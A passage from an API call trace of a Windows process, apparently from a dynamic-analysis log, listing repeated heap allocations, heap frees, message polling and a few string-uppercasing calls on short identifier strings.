Flags=0x0, Size=0x38) returned 0x2a5e980 [0205.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0205.669] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0205.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0205.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0205.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0205.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0205.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0205.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0205.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0205.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0205.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0205.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0205.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0205.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0205.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0205.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0205.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0205.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0205.670] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0205.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0205.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0205.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0205.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0205.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0205.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0205.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0205.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0205.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0205.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0205.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0205.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0205.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0205.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0205.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0205.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0205.671] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0205.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0205.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0205.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0205.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0205.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0205.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0205.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0205.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0205.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0205.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0205.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0205.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0205.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0205.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0205.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0205.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0205.671] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0205.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0205.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0205.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0205.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0205.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0205.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0205.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0205.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabe8 [0205.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0205.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0205.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0205.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacc0 [0205.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad20 [0205.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0205.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0205.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0205.672] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0205.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0205.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0205.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0205.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0205.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacd8 [0205.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0205.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0205.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab58 [0205.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0205.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0205.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0205.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad38 [0205.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab70 [0205.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0205.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0205.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0205.673] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0205.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0205.673] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0205.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0205.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0205.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa960 [0205.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0205.673] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0205.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0205.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad68 [0205.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaca8 [0205.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0205.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab88 [0205.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0205.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0205.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0205.673] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0205.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0205.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0205.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0205.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaca8 | out: hHeap=0x2af0000) returned 1 [0205.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad68 | out: hHeap=0x2af0000) returned 1 [0205.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0205.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0205.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0205.674] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0205.674] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0205.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0205.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0205.674] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0205.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0205.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0205.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaac18 [0205.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73f68 [0205.674] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0205.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0205.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0205.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad80 [0205.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaba0 [0205.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0205.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad50 [0205.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0205.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0205.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0205.675] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0205.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0205.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0205.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0205.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0205.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0205.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0205.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0205.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0205.675] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0205.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0205.675] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0205.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0205.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0205.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac30 [0205.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab88 [0205.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0205.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae28 [0205.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0205.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae28 | out: hHeap=0x2af0000) returned 1 [0205.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0205.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0205.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0205.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0205.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73f68 | out: hHeap=0x2af0000) returned 1 [0205.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac18 | out: hHeap=0x2af0000) returned 1 [0205.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0205.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0205.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac48 [0205.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabe8 [0205.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0205.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaba0 [0205.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0205.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0205.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0205.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac48 | out: hHeap=0x2af0000) returned 1 [0205.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0205.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0205.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0205.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0205.676] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0205.676] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0205.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0205.676] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0205.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0205.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0205.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaac48 [0205.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74280 [0205.677] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0205.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0205.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0205.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaca8 [0205.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac30 [0205.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0205.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacf0 [0205.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0205.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0205.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0205.677] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0205.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0205.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0205.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacf0 | out: hHeap=0x2af0000) returned 1 [0205.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0205.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaca8 | out: hHeap=0x2af0000) returned 1 [0205.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0205.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0205.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0205.677] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0205.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0205.677] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0205.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0205.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadb0 [0205.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadc8 [0205.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0205.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacf0 [0205.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0205.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacf0 | out: hHeap=0x2af0000) returned 1 [0205.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0205.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0205.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0205.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0205.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabd0 [0205.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad08 [0205.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0205.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae10 [0205.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0205.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0205.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0205.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabd0 | out: 